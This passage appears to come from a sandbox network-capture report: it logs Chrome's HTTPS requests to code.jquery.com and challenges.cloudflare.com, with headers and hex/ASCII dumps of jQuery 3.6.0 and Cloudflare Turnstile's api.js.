                                                      2025-01-14 15:11:22 UTC1369INData Raw: 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30
                                                      Data Ascii: =C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.749726151.101.194.1374433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:22 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                      Host: code.jquery.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:22 UTC613INHTTP/1.1 200 OK
                                                      Connection: close
                                                      Content-Length: 89501
                                                      Server: nginx
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                      ETag: "28feccc0-15d9d"
                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                      Access-Control-Allow-Origin: *
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Via: 1.1 varnish, 1.1 varnish
                                                      Accept-Ranges: bytes
                                                      Date: Tue, 14 Jan 2025 15:11:22 GMT
                                                      Age: 2352008
                                                      X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740052-EWR
                                                      X-Cache: HIT, HIT
                                                      X-Cache-Hits: 2774, 3
                                                      X-Timer: S1736867483.737125,VS0,VE0
                                                      Vary: Accept-Encoding
                                                      2025-01-14 15:11:22 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                      2025-01-14 15:11:22 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                      2025-01-14 15:11:22 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                      2025-01-14 15:11:22 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                      2025-01-14 15:11:22 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                      2025-01-14 15:11:22 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.749727104.18.94.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:23 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:23 UTC471INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:23 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Content-Length: 47521
                                                      Connection: close
                                                      accept-ranges: bytes
                                                      last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                      access-control-allow-origin: *
                                                      cross-origin-resource-policy: cross-origin
                                                      Server: cloudflare
                                                      CF-RAY: 901e8eeb2ba142b3-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:23 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                      Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                      Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                      Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                      Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                      Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                      Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                      Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                      Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                      Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                      Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.749728104.18.95.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
